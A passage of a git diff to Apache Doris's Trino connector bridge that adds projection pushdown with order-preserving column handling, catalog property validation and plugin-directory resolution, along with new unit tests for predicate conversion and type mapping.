remaining + // TupleDomain back to a ConnectorExpression and clear fully-pushed conjuncts. + return Optional.of(new FilterApplicationResult<>(newHandle, expression, false)); + } + + @Override + public Optional> applyProjection( + ConnectorSession session, + ConnectorTableHandle handle, + List projections) { + if (projections.isEmpty()) { + return Optional.empty(); + } + TrinoTableHandle dorisHandle = (TrinoTableHandle) handle; + Map colHandleMap = dorisHandle.getColumnHandleMap(); + Map colMetaMap = dorisHandle.getColumnMetadataMap(); + + // Use LinkedHashMap: Trino's JDBC applyProjection derives the pushed-down handle's + // column order from assignments.values(). A HashMap would scramble that order, and + // because the later TrinoScanPlanProvider projection short-circuits to empty once the + // column *set* matches, the scrambled order would survive and break the BE-side + // engine-vs-handle column verify. Matches the legacy TrinoConnectorScanNode. + Map assignments = new LinkedHashMap<>(); + List trinoProjections = new ArrayList<>(); + for (ConnectorColumnHandle col : projections) { + String colName = ((TrinoColumnHandle) col).getColumnName(); + ColumnHandle ch = colHandleMap.get(colName); + ColumnMetadata cm = colMetaMap.get(colName); + if (ch == null || cm == null) { + continue; + } + assignments.put(colName, ch); + trinoProjections.add(new Variable(colName, cm.getType())); + } + if (trinoProjections.isEmpty()) { + return Optional.empty(); + } + + io.trino.spi.connector.ConnectorSession connSession = + trinoSession.toConnectorSession(trinoCatalogHandle); + io.trino.spi.connector.ConnectorTransactionHandle txn = + trinoConnector.beginTransaction(IsolationLevel.READ_UNCOMMITTED, true, true); + io.trino.spi.connector.ConnectorMetadata metadata = + trinoConnector.getMetadata(connSession, txn); + + Optional> trinoResult = + metadata.applyProjection(connSession, dorisHandle.getTrinoTableHandle(), + trinoProjections, assignments); + if (!trinoResult.isPresent()) { + return Optional.empty(); + } + + TrinoTableHandle newHandle = new TrinoTableHandle( + dorisHandle.getDbName(), + dorisHandle.getTableName(), + trinoResult.get().getHandle(), + colHandleMap, + colMetaMap); + + List outProjections = new ArrayList<>(projections.size()); + List outAssignments = new ArrayList<>(projections.size()); + for (ConnectorColumnHandle col : projections) { + String colName = ((TrinoColumnHandle) col).getColumnName(); + ColumnMetadata cm = colMetaMap.get(colName); + if (cm == null) { + continue; + } + ConnectorType type = TrinoTypeMapping.toConnectorType(cm.getType()); + ConnectorColumnRef ref = new ConnectorColumnRef(colName, type); + outProjections.add(ref); + outAssignments.add(new ConnectorColumnAssignment(col, ref)); + } + return Optional.of(new ProjectionApplicationResult<>(newHandle, outProjections, outAssignments)); + } } diff --git a/fe/fe-connector/fe-connector-trino/src/main/java/org/apache/doris/connector/trino/TrinoConnectorProvider.java b/fe/fe-connector/fe-connector-trino/src/main/java/org/apache/doris/connector/trino/TrinoConnectorProvider.java index 946987fade13d5..f685261c23b231 100644 --- a/fe/fe-connector/fe-connector-trino/src/main/java/org/apache/doris/connector/trino/TrinoConnectorProvider.java +++ b/fe/fe-connector/fe-connector-trino/src/main/java/org/apache/doris/connector/trino/TrinoConnectorProvider.java @@ -29,6 +29,8 @@ */ public class TrinoConnectorProvider implements ConnectorProvider { + static final String TRINO_CONNECTOR_NAME = "trino.connector.name"; + @Override public String getType() { return "trino-connector"; @@ -38,4 +40,13 @@ public String getType() { public Connector create(Map properties, ConnectorContext context) { return new TrinoDorisConnector(properties, context); } + + @Override + public void validateProperties(Map properties) { + String connectorName = properties.get(TRINO_CONNECTOR_NAME); + if (connectorName == null || connectorName.isEmpty()) { + throw new IllegalArgumentException( + "Required property '" + TRINO_CONNECTOR_NAME + "' is missing"); + } + } } diff --git a/fe/fe-connector/fe-connector-trino/src/main/java/org/apache/doris/connector/trino/TrinoDorisConnector.java b/fe/fe-connector/fe-connector-trino/src/main/java/org/apache/doris/connector/trino/TrinoDorisConnector.java index c6f6f4ba9a88cd..710c7a4cd102d7 100644 --- a/fe/fe-connector/fe-connector-trino/src/main/java/org/apache/doris/connector/trino/TrinoDorisConnector.java +++ b/fe/fe-connector/fe-connector-trino/src/main/java/org/apache/doris/connector/trino/TrinoDorisConnector.java @@ -20,6 +20,7 @@ import org.apache.doris.connector.api.Connector; import org.apache.doris.connector.api.ConnectorMetadata; import org.apache.doris.connector.api.ConnectorSession; +import org.apache.doris.connector.api.ConnectorValidationContext; import org.apache.doris.connector.api.scan.ConnectorScanPlanProvider; import org.apache.doris.connector.spi.ConnectorContext; @@ -73,6 +74,14 @@ public ConnectorScanPlanProvider getScanPlanProvider() { return new TrinoScanPlanProvider(this); } + @Override + public void preCreateValidation(ConnectorValidationContext context) { + // Lift plugin loading + connector-factory resolution from first-query + // to CREATE CATALOG time, so misconfigured plugin dir / connector name + // surfaces immediately instead of on the first SELECT. + ensureInitialized(); + } + @Override public org.apache.doris.connector.api.ConnectorTestResult testConnection(ConnectorSession session) { ensureInitialized(); @@ -154,8 +163,10 @@ private void doInitialize() { deprecated, connectorNameStr); } - // 2. Initialize Trino plugin infrastructure (singleton) - String pluginDir = TrinoBootstrap.resolvePluginDir(properties); + // 2. Initialize Trino plugin infrastructure (singleton). + // The plugin dir comes from the FE engine environment (fe-core reads fe.conf); + // this plugin's classloader cannot see FE Config directly. + String pluginDir = TrinoBootstrap.resolvePluginDir(properties, context.getEnvironment()); TrinoBootstrap bootstrap = TrinoBootstrap.getInstance(pluginDir); // 3. Create Trino Connector + Session for this catalog diff --git a/fe/fe-connector/fe-connector-trino/src/main/java/org/apache/doris/connector/trino/TrinoScanPlanProvider.java b/fe/fe-connector/fe-connector-trino/src/main/java/org/apache/doris/connector/trino/TrinoScanPlanProvider.java index 55bd8a937c22a5..5c6cfbdb35fe7d 100644 --- a/fe/fe-connector/fe-connector-trino/src/main/java/org/apache/doris/connector/trino/TrinoScanPlanProvider.java +++ b/fe/fe-connector/fe-connector-trino/src/main/java/org/apache/doris/connector/trino/TrinoScanPlanProvider.java @@ -53,6 +53,7 @@ import java.util.ArrayList; import java.util.HashMap; +import java.util.LinkedHashMap; import java.util.List; import java.util.Map; import java.util.Optional; @@ -136,14 +137,17 @@ public List planScan( } } - // Apply projection pushdown - applyProjection(metadata, connSession, trinoHandle, currentTrinoHandle, columns); + // Apply projection pushdown. The returned handle carries the projected column + // list (e.g. JdbcTableHandle.getColumns()); it MUST be the handle serialized to BE. + // Otherwise Trino's JdbcRecordSetProvider.getRecordSet() fails its verify() because + // the handle's columns won't match the column handles passed to the scanner. + currentTrinoHandle = applyProjection(metadata, connSession, trinoHandle, currentTrinoHandle, columns); // Get splits return getSplitsFromTrino( connector, trinoSession, catalogHandle, connSession, txnHandle, metadata, currentTrinoHandle, constraint, - trinoHandle, session); + trinoHandle, columns, session); } finally { metadata.cleanupQuery(connSession); } @@ -158,7 +162,10 @@ private io.trino.spi.connector.ConnectorTableHandle applyProjection( Map colHandleMap = trinoHandle.getColumnHandleMap(); Map colMetaMap = trinoHandle.getColumnMetadataMap(); - Map assignments = new HashMap<>(); + // Preserve projection order (matches the serialized column handles below and the legacy + // TrinoConnectorScanNode). A plain HashMap would scramble JdbcTableHandle's column order + // and break the engine-vs-handle column verify on the BE scanner. + Map assignments = new LinkedHashMap<>(); List projections = new ArrayList<>(); for (ConnectorColumnHandle col : columns) { @@ -189,6 +196,7 @@ private List getSplitsFromTrino( io.trino.spi.connector.ConnectorTableHandle tableHandle, Constraint constraint, TrinoTableHandle dorisHandle, + List columns, ConnectorSession dorisSession) { ConnectorSplitManager splitManager = connector.getSplitManager(); @@ -204,17 +212,17 @@ private List getSplitsFromTrino( new BoundedExecutor(executor, 10), MIN_SCHEDULE_SPLIT_BATCH_SIZE); } - // Prepare JSON serializer - TrinoBootstrap bootstrap = TrinoBootstrap.getInstance( - TrinoBootstrap.resolvePluginDir(dorisConnector.getTrinoProperties())); + // Prepare JSON serializer. The bootstrap singleton was already initialized when the + // catalog was created, so reuse it instead of re-resolving the plugin directory. + TrinoBootstrap bootstrap = TrinoBootstrap.getInstance(); TrinoJsonSerializer serializer = new TrinoJsonSerializer( bootstrap.getHandleResolver(), bootstrap.getTypeRegistry()); // Pre-serialize shared fields (same for all splits) String tableHandleJson = serializer.toJson(tableHandle); String txnHandleJson = serializer.toJson(txnHandle); - String columnHandlesJson = serializeColumnHandles(dorisHandle, serializer); - String columnMetadataJson = serializeColumnMetadata(dorisHandle, serializer); + String columnHandlesJson = serializeColumnHandles(dorisHandle, columns, serializer); + String columnMetadataJson = serializeColumnMetadata(dorisHandle, columns, serializer); String optionsJson = serializeOptions(dorisSession); String catalogName = dorisSession.getCatalogName(); @@ -263,28 +271,55 @@ private Constraint buildConstraint(Optional filter, return new Constraint(tupleDomain); } + // Serialize only the projected columns, in the same order (and with the same filter) + // applyProjection used, so the column handles passed to the BE scanner match + // JdbcTableHandle.getColumns() exactly (Trino's getRecordSet verifies handles.equals(columns)). private String serializeColumnHandles(TrinoTableHandle handle, - TrinoJsonSerializer serializer) { - List handles = new ArrayList<>(handle.getColumnHandleMap().values()); + List columns, TrinoJsonSerializer serializer) { + Map colHandleMap = handle.getColumnHandleMap(); + Map colMetaMap = handle.getColumnMetadataMap(); + List handles = new ArrayList<>(); + for (ConnectorColumnHandle col : columns) { + String colName = ((TrinoColumnHandle) col).getColumnName(); + if (colHandleMap.containsKey(colName) && colMetaMap.containsKey(colName)) { + handles.add(colHandleMap.get(colName)); + } + } return serializer.toJson(handles); } private String serializeColumnMetadata(TrinoTableHandle handle, - TrinoJsonSerializer serializer) { - List metadataList = handle.getColumnMetadataMap().values().stream() - .map(m -> new TrinoColumnMetadata( + List columns, TrinoJsonSerializer serializer) { + Map colHandleMap = handle.getColumnHandleMap(); + Map colMetaMap = handle.getColumnMetadataMap(); + List metadataList = new ArrayList<>(); + for (ConnectorColumnHandle col : columns) { + String colName = ((TrinoColumnHandle) col).getColumnName(); + if (colHandleMap.containsKey(colName) && colMetaMap.containsKey(colName)) { + ColumnMetadata m = colMetaMap.get(colName); + metadataList.add(new TrinoColumnMetadata( m.getName(), m.getType(), m.isNullable(), m.getComment(), m.getExtraInfo(), m.isHidden(), - m.getProperties())) - .collect(Collectors.toList()); + m.getProperties())); + } + } return serializer.toJson(metadataList); } private String serializeOptions(ConnectorSession session) { - Map props = new HashMap<>(session.getCatalogProperties()); - if (!props.containsKey("create_time")) { - props.put("create_time", String.valueOf(System.currentTimeMillis() / 1000)); + // BE re-adds the "trino." prefix to every option key (TRINO_CONNECTOR_OPTION_PREFIX), + // then strips it back off and reads "connector.name" from the result. So the options + // map must carry the *stripped* trino.* properties (connector.name, .*), + // matching the legacy TrinoConnectorScanNode. Sending the full prefixed catalog + // properties here would double the prefix and make BE read a null connector.name. + Map props = new HashMap<>(dorisConnector.getTrinoProperties()); + // BE also needs create_time; it is part of the BE-side connector cache key, so + // preserve the catalog's value rather than minting a new one per scan. + String createTime = session.getCatalogProperties().get("create_time"); + if (createTime == null || createTime.isEmpty()) { + createTime = String.valueOf(System.currentTimeMillis() / 1000); } + props.put("create_time", createTime); try { return new ObjectMapper().writeValueAsString(props); } catch (JsonProcessingException e) { diff --git a/fe/fe-connector/fe-connector-trino/src/test/java/org/apache/doris/connector/trino/TrinoBootstrapTest.java b/fe/fe-connector/fe-connector-trino/src/test/java/org/apache/doris/connector/trino/TrinoBootstrapTest.java new file mode 100644 index 00000000000000..efbe087e48e3ba --- /dev/null +++ b/fe/fe-connector/fe-connector-trino/src/test/java/org/apache/doris/connector/trino/TrinoBootstrapTest.java @@ -0,0 +1,70 @@ +// Licensed to the Apache Software Foundation (ASF) under one +// or more contributor license agreements. See the NOTICE file +// distributed with this work for additional information +// regarding copyright ownership. The ASF licenses this file +// to you under the Apache License, Version 2.0 (the +// "License"); you may not use this file except in compliance +// with the License. You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package org.apache.doris.connector.trino; + +import com.google.common.collect.ImmutableMap; +import org.junit.jupiter.api.Assertions; +import org.junit.jupiter.api.Test; + +import java.util.Collections; +import java.util.Map; + +/** + * Unit tests for {@link TrinoBootstrap#resolvePluginDir}. + * + *

Guards the plugin-directory resolution the regression environment depends on: the + * connectors are dispatched to a custom directory and {@code fe.conf} points + * {@code trino_connector_plugin_dir} at it. Because this plugin runs in an isolated + * classloader, it cannot read FE {@code Config}; the value must arrive through the engine + * environment map. A regression once made every {@code trino-connector} catalog fail with + * "Cannot find Trino ConnectorFactory" because that override was not honored. + */ +public class TrinoBootstrapTest { + + @Test + public void perCatalogPropertyTakesPrecedence() { + Map env = ImmutableMap.of( + "doris_home", "/opt/doris", + "trino_connector_plugin_dir", "/should/be/ignored"); + String resolved = TrinoBootstrap.resolvePluginDir( + ImmutableMap.of("trino.plugin.dir", "/custom/catalog/dir"), env); + Assertions.assertEquals("/custom/catalog/dir", resolved); + } + + @Test + public void feConfigFromEnvironmentIsHonored() { + // Exactly what the regression environment sets in fe.conf, delivered via the + // engine environment because the plugin classloader cannot read FE Config. + Map env = ImmutableMap.of( + "doris_home", "/opt/doris", + "trino_connector_plugin_dir", "/tmp/trino_connector/connectors"); + String resolved = TrinoBootstrap.resolvePluginDir(Collections.emptyMap(), env); + Assertions.assertEquals("/tmp/trino_connector/connectors", resolved); + } + + @Test + public void defaultsToDorisHomeWhenConfigIsDefault() { + // Config left at its default value (DORIS_HOME/plugins/connectors). With no + // pre-2.1.8 dir present under the fake home, the default dir is returned. + Map env = ImmutableMap.of( + "doris_home", "/opt/doris", + "trino_connector_plugin_dir", "/opt/doris/plugins/connectors"); + String resolved = TrinoBootstrap.resolvePluginDir(Collections.emptyMap(), env); + Assertions.assertEquals("/opt/doris/plugins/connectors", resolved); + } +} diff --git a/fe/fe-connector/fe-connector-trino/src/test/java/org/apache/doris/connector/trino/TrinoConnectorProviderTest.java b/fe/fe-connector/fe-connector-trino/src/test/java/org/apache/doris/connector/trino/TrinoConnectorProviderTest.java new file mode 100644 index 00000000000000..15f8624d030f64 --- /dev/null +++ b/fe/fe-connector/fe-connector-trino/src/test/java/org/apache/doris/connector/trino/TrinoConnectorProviderTest.java @@ -0,0 +1,61 @@ +// Licensed to the Apache Software Foundation (ASF) under one +// or more contributor license agreements. See the NOTICE file +// distributed with this work for additional information +// regarding copyright ownership. The ASF licenses this file +// to you under the Apache License, Version 2.0 (the +// "License"); you may not use this file except in compliance +// with the License. You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package org.apache.doris.connector.trino; + +import com.google.common.collect.ImmutableMap; +import org.junit.jupiter.api.Assertions; +import org.junit.jupiter.api.Test; + +import java.util.Collections; + +/** + * Unit tests for {@link TrinoConnectorProvider}: CREATE CATALOG must fail fast at + * validation time when the required {@code trino.connector.name} property is absent, + * so the error surfaces on catalog creation rather than on first query. + */ +public class TrinoConnectorProviderTest { + + private static final String NAME_PROP = "trino.connector.name"; + + private final TrinoConnectorProvider provider = new TrinoConnectorProvider(); + + @Test + public void testTypeIsTrinoConnector() { + Assertions.assertEquals("trino-connector", provider.getType()); + } + + @Test + public void testMissingConnectorNameThrows() { + IllegalArgumentException ex = Assertions.assertThrows(IllegalArgumentException.class, + () -> provider.validateProperties(Collections.emptyMap())); + Assertions.assertTrue(ex.getMessage().contains(NAME_PROP), + "error message should name the missing property"); + } + + @Test + public void testEmptyConnectorNameThrows() { + Assertions.assertThrows(IllegalArgumentException.class, + () -> provider.validateProperties(ImmutableMap.of(NAME_PROP, ""))); + } + + @Test + public void testPresentConnectorNamePasses() { + Assertions.assertDoesNotThrow( + () -> provider.validateProperties(ImmutableMap.of(NAME_PROP, "postgresql"))); + } +} diff --git a/fe/fe-connector/fe-connector-trino/src/test/java/org/apache/doris/connector/trino/TrinoPredicateConverterTest.java b/fe/fe-connector/fe-connector-trino/src/test/java/org/apache/doris/connector/trino/TrinoPredicateConverterTest.java new file mode 100644 index 00000000000000..772cd579f2f819 --- /dev/null +++ b/fe/fe-connector/fe-connector-trino/src/test/java/org/apache/doris/connector/trino/TrinoPredicateConverterTest.java @@ -0,0 +1,239 @@ +// Licensed to the Apache Software Foundation (ASF) under one +// or more contributor license agreements. See the NOTICE file +// distributed with this work for additional information +// regarding copyright ownership. The ASF licenses this file +// to you under the Apache License, Version 2.0 (the +// "License"); you may not use this file except in compliance +// with the License. You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package org.apache.doris.connector.trino; + +import org.apache.doris.connector.api.ConnectorType; +import org.apache.doris.connector.api.pushdown.ConnectorAnd; +import org.apache.doris.connector.api.pushdown.ConnectorColumnRef; +import org.apache.doris.connector.api.pushdown.ConnectorComparison; +import org.apache.doris.connector.api.pushdown.ConnectorExpression; +import org.apache.doris.connector.api.pushdown.ConnectorIn; +import org.apache.doris.connector.api.pushdown.ConnectorIsNull; +import org.apache.doris.connector.api.pushdown.ConnectorLiteral; +import org.apache.doris.connector.api.pushdown.ConnectorOr; + +import com.google.common.collect.ImmutableMap; +import io.airlift.slice.Slices; +import io.trino.spi.connector.ColumnHandle; +import io.trino.spi.connector.ColumnMetadata; +import io.trino.spi.predicate.Domain; +import io.trino.spi.predicate.Range; +import io.trino.spi.predicate.TupleDomain; +import io.trino.spi.predicate.ValueSet; +import io.trino.spi.type.BigintType; +import io.trino.spi.type.BooleanType; +import io.trino.spi.type.IntegerType; +import io.trino.spi.type.Type; +import io.trino.spi.type.VarcharType; +import org.junit.jupiter.api.Assertions; +import org.junit.jupiter.api.Test; + +import java.util.Arrays; +import java.util.Map; + +/** + * Unit tests for {@link TrinoPredicateConverter}: Doris {@code ConnectorExpression} + * pushdown trees must convert to the exact Trino {@link TupleDomain} that preserves + * filter semantics, and must degrade to {@code TupleDomain.all()} (no pushdown, full + * scan) rather than fail when an expression cannot be represented. + */ +public class TrinoPredicateConverterTest { + + // A column handle is an opaque marker to the converter; it ends up as the key of + // the produced TupleDomain. equals/hashCode by name so expected/actual compare equal. + private static final class MockColumnHandle implements ColumnHandle { + private final String name; + + private MockColumnHandle(String name) { + this.name = name; + } + + @Override + public boolean equals(Object o) { + return o instanceof MockColumnHandle && name.equals(((MockColumnHandle) o).name); + } + + @Override + public int hashCode() { + return name.hashCode(); + } + } + + private static final Map HANDLES = ImmutableMap.of( + "c_int", new MockColumnHandle("c_int"), + "c_bigint", new MockColumnHandle("c_bigint"), + "c_str", new MockColumnHandle("c_str"), + "c_bool", new MockColumnHandle("c_bool")); + + private static final Map METAS = ImmutableMap.of( + "c_int", new ColumnMetadata("c_int", IntegerType.INTEGER), + "c_bigint", new ColumnMetadata("c_bigint", BigintType.BIGINT), + "c_str", new ColumnMetadata("c_str", VarcharType.createVarcharType(64)), + "c_bool", new ColumnMetadata("c_bool", BooleanType.BOOLEAN)); + + private static final TrinoPredicateConverter CONVERTER = new TrinoPredicateConverter(HANDLES, METAS); + + private static ConnectorColumnRef col(String name) { + // The Doris type here is unused by the converter; it resolves the Trino type + // from the column metadata map. A placeholder keeps the ref construction simple. + return new ConnectorColumnRef(name, ConnectorType.of("INT")); + } + + private static Type type(String name) { + return METAS.get(name).getType(); + } + + private static Domain singleValue(String colName, Object value) { + return Domain.create(ValueSet.ofRanges(Range.equal(type(colName), value)), false); + } + + private static TupleDomain expect(String colName, Domain domain) { + return TupleDomain.withColumnDomains(ImmutableMap.of(HANDLES.get(colName), domain)); + } + + @Test + public void testEqProducesSingleValueDomain() { + // c_int = 5 -> domain pinned to the single value 5 + ConnectorComparison cmp = new ConnectorComparison( + ConnectorComparison.Operator.EQ, col("c_int"), ConnectorLiteral.ofInt(5)); + Assertions.assertEquals(expect("c_int", singleValue("c_int", 5L)), CONVERTER.convert(cmp)); + } + + @Test + public void testBooleanEqKeepsBooleanValue() { + // c_bool = true -> boolean literals are passed through unchanged (not coerced to long) + ConnectorComparison cmp = new ConnectorComparison( + ConnectorComparison.Operator.EQ, col("c_bool"), ConnectorLiteral.ofBoolean(true)); + Assertions.assertEquals(expect("c_bool", singleValue("c_bool", true)), CONVERTER.convert(cmp)); + } + + @Test + public void testLessThanProducesOpenUpperRange() { + // c_int < 10 -> (-inf, 10) + ConnectorComparison cmp = new ConnectorComparison( + ConnectorComparison.Operator.LT, col("c_int"), ConnectorLiteral.ofInt(10)); + Domain expected = Domain.create(ValueSet.ofRanges(Range.lessThan(type("c_int"), 10L)), false); + Assertions.assertEquals(expect("c_int", expected), CONVERTER.convert(cmp)); + } + + @Test + public void testGreaterOrEqualProducesClosedLowerRange() { + // c_bigint >= 100 -> [100, +inf) + ConnectorComparison cmp = new ConnectorComparison( + ConnectorComparison.Operator.GE, col("c_bigint"), ConnectorLiteral.ofLong(100L)); + Domain expected = Domain.create( + ValueSet.ofRanges(Range.greaterThanOrEqual(type("c_bigint"), 100L)), false); + Assertions.assertEquals(expect("c_bigint", expected), CONVERTER.convert(cmp)); + } + + @Test + public void testNotEqualExcludesValue() { + // c_int != 7 -> everything except 7 + ConnectorComparison cmp = new ConnectorComparison( + ConnectorComparison.Operator.NE, col("c_int"), ConnectorLiteral.ofInt(7)); + Domain expected = Domain.create( + ValueSet.all(type("c_int")).subtract(ValueSet.ofRanges(Range.equal(type("c_int"), 7L))), + false); + Assertions.assertEquals(expect("c_int", expected), CONVERTER.convert(cmp)); + } + + @Test + public void testVarcharEqEncodesAsSlice() { + // c_str = 'hello' -> string literal must be encoded as a Trino Slice + ConnectorComparison cmp = new ConnectorComparison( + ConnectorComparison.Operator.EQ, col("c_str"), ConnectorLiteral.ofString("hello")); + Assertions.assertEquals( + expect("c_str", singleValue("c_str", Slices.utf8Slice("hello"))), + CONVERTER.convert(cmp)); + } + + @Test + public void testInProducesMultiValueDomain() { + // c_int IN (1, 2, 3) -> domain of the three discrete values + ConnectorIn in = new ConnectorIn(col("c_int"), + Arrays.asList(ConnectorLiteral.ofInt(1), ConnectorLiteral.ofInt(2), ConnectorLiteral.ofInt(3)), + false); + Domain expected = Domain.create(ValueSet.ofRanges( + Range.equal(type("c_int"), 1L), + Range.equal(type("c_int"), 2L), + Range.equal(type("c_int"), 3L)), false); + Assertions.assertEquals(expect("c_int", expected), CONVERTER.convert(in)); + } + + @Test + public void testNotInExcludesValues() { + // c_int NOT IN (1, 2) -> everything except 1 and 2 + ConnectorIn in = new ConnectorIn(col("c_int"), + Arrays.asList(ConnectorLiteral.ofInt(1), ConnectorLiteral.ofInt(2)), true); + Domain expected = Domain.create(ValueSet.all(type("c_int")).subtract(ValueSet.ofRanges( + Range.equal(type("c_int"), 1L), Range.equal(type("c_int"), 2L))), false); + Assertions.assertEquals(expect("c_int", expected), CONVERTER.convert(in)); + } + + @Test + public void testIsNullProducesOnlyNullDomain() { + // c_str IS NULL -> only-null domain + ConnectorIsNull isNull = new ConnectorIsNull(col("c_str"), false); + Assertions.assertEquals(expect("c_str", Domain.onlyNull(type("c_str"))), CONVERTER.convert(isNull)); + } + + @Test + public void testIsNotNullProducesNotNullDomain() { + // c_str IS NOT NULL -> not-null domain + ConnectorIsNull isNotNull = new ConnectorIsNull(col("c_str"), true); + Assertions.assertEquals(expect("c_str", Domain.notNull(type("c_str"))), CONVERTER.convert(isNotNull)); + } + + @Test + public void testAndIntersectsAcrossColumns() { + // c_int = 5 AND c_bigint = 100 -> both columns constrained in one TupleDomain + ConnectorAnd and = new ConnectorAnd(Arrays.asList( + new ConnectorComparison(ConnectorComparison.Operator.EQ, col("c_int"), ConnectorLiteral.ofInt(5)), + new ConnectorComparison(ConnectorComparison.Operator.EQ, col("c_bigint"), + ConnectorLiteral.ofLong(100L)))); + TupleDomain expected = TupleDomain.withColumnDomains(ImmutableMap.of( + HANDLES.get("c_int"), singleValue("c_int", 5L), + HANDLES.get("c_bigint"), singleValue("c_bigint", 100L))); + Assertions.assertEquals(expected, CONVERTER.convert(and)); + } + + @Test + public void testOrUnionsSameColumn() { + // c_int = 1 OR c_int = 2 -> union into a two-value domain on c_int + ConnectorOr or = new ConnectorOr(Arrays.asList( + new ConnectorComparison(ConnectorComparison.Operator.EQ, col("c_int"), ConnectorLiteral.ofInt(1)), + new ConnectorComparison(ConnectorComparison.Operator.EQ, col("c_int"), ConnectorLiteral.ofInt(2)))); + Domain expected = Domain.create(ValueSet.ofRanges( + Range.equal(type("c_int"), 1L), Range.equal(type("c_int"), 2L)), false); + Assertions.assertEquals(expect("c_int", expected), CONVERTER.convert(or)); + } + + @Test + public void testNullExpressionDegradesToAll() { + // A null filter must not be pushed down: scan everything. + Assertions.assertEquals(TupleDomain.all(), CONVERTER.convert(null)); + } + + @Test + public void testUnsupportedExpressionDegradesToAll() { + // A bare column reference is not a predicate; convert() must swallow the failure + // and return all() so the query still runs (just without pushdown). + ConnectorExpression unsupported = col("c_int"); + Assertions.assertEquals(TupleDomain.all(), CONVERTER.convert(unsupported)); + } +} diff --git a/fe/fe-connector/fe-connector-trino/src/test/java/org/apache/doris/connector/trino/TrinoTypeMappingTest.java b/fe/fe-connector/fe-connector-trino/src/test/java/org/apache/doris/connector/trino/TrinoTypeMappingTest.java new file mode 100644 index 00000000000000..303357c828f2a7 --- /dev/null +++ b/fe/fe-connector/fe-connector-trino/src/test/java/org/apache/doris/connector/trino/TrinoTypeMappingTest.java @@ -0,0 +1,141 @@ +// Licensed to the Apache Software Foundation (ASF) under one +// or more contributor license agreements. See the NOTICE file +// distributed with this work for additional information +// regarding copyright ownership. The ASF licenses this file +// to you under the Apache License, Version 2.0 (the +// "License"); you may not use this file except in compliance +// with the License. You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package org.apache.doris.connector.trino; + +import org.apache.doris.connector.api.ConnectorType; + +import io.trino.spi.type.ArrayType; +import io.trino.spi.type.BigintType; +import io.trino.spi.type.BooleanType; +import io.trino.spi.type.CharType; +import io.trino.spi.type.DateType; +import io.trino.spi.type.DecimalType; +import io.trino.spi.type.DoubleType; +import io.trino.spi.type.IntegerType; +import io.trino.spi.type.MapType; +import io.trino.spi.type.RealType; +import io.trino.spi.type.RowType; +import io.trino.spi.type.SmallintType; +import io.trino.spi.type.TimestampType; +import io.trino.spi.type.TinyintType; +import io.trino.spi.type.TypeOperators; +import io.trino.spi.type.UuidType; +import io.trino.spi.type.VarbinaryType; +import io.trino.spi.type.VarcharType; +import org.junit.jupiter.api.Assertions; +import org.junit.jupiter.api.Test; + +/** + * Unit tests for {@link TrinoTypeMapping}: every supported Trino SPI type must map to + * the Doris {@link ConnectorType} name (and precision/scale/children) that the rest of + * the bridge relies on for schema fidelity; unsupported types must fail loudly. + */ +public class TrinoTypeMappingTest { + + private static String name(io.trino.spi.type.Type type) { + return TrinoTypeMapping.toConnectorType(type).getTypeName(); + } + + @Test + public void testIntegerFamilyNames() { + Assertions.assertEquals("BOOLEAN", name(BooleanType.BOOLEAN)); + Assertions.assertEquals("TINYINT", name(TinyintType.TINYINT)); + Assertions.assertEquals("SMALLINT", name(SmallintType.SMALLINT)); + Assertions.assertEquals("INT", name(IntegerType.INTEGER)); + Assertions.assertEquals("BIGINT", name(BigintType.BIGINT)); + } + + @Test + public void testRealMapsToFloatAndDoubleToDouble() { + Assertions.assertEquals("FLOAT", name(RealType.REAL)); + Assertions.assertEquals("DOUBLE", name(DoubleType.DOUBLE)); + } + + @Test + public void testDecimalCarriesPrecisionAndScale() { + ConnectorType ct = TrinoTypeMapping.toConnectorType(DecimalType.createDecimalType(18, 4)); + Assertions.assertEquals("DECIMALV3", ct.getTypeName()); + Assertions.assertEquals(18, ct.getPrecision()); + Assertions.assertEquals(4, ct.getScale()); + } + + @Test + public void testStringFamilyNames() { + Assertions.assertEquals("CHAR", name(CharType.createCharType(10))); + Assertions.assertEquals("STRING", name(VarcharType.createVarcharType(20))); + Assertions.assertEquals("STRING", name(VarcharType.VARCHAR)); + Assertions.assertEquals("STRING", name(VarbinaryType.VARBINARY)); + } + + @Test + public void testDateMapsToDateV2() { + Assertions.assertEquals("DATEV2", name(DateType.DATE)); + } + + @Test + public void testTimestampMapsToDatetimeV2WithPrecision() { + ConnectorType ct = TrinoTypeMapping.toConnectorType(TimestampType.createTimestampType(3)); + Assertions.assertEquals("DATETIMEV2", ct.getTypeName()); + Assertions.assertEquals(3, ct.getPrecision()); + } + + @Test + public void testTimestampPrecisionClampedToSix() { + // Doris DATETIMEV2 supports at most 6 fractional digits; higher Trino precision clamps. + ConnectorType ct = TrinoTypeMapping.toConnectorType(TimestampType.createTimestampType(9)); + Assertions.assertEquals("DATETIMEV2", ct.getTypeName()); + Assertions.assertEquals(6, ct.getPrecision()); + } + + @Test + public void testArrayCarriesElementType() { + ConnectorType ct = TrinoTypeMapping.toConnectorType(new ArrayType(IntegerType.INTEGER)); + Assertions.assertEquals("ARRAY", ct.getTypeName()); + Assertions.assertEquals(1, ct.getChildren().size()); + Assertions.assertEquals("INT", ct.getChildren().get(0).getTypeName()); + } + + @Test + public void testMapCarriesKeyAndValueTypes() { + ConnectorType ct = TrinoTypeMapping.toConnectorType( + new MapType(VarcharType.VARCHAR, BigintType.BIGINT, new TypeOperators())); + Assertions.assertEquals("MAP", 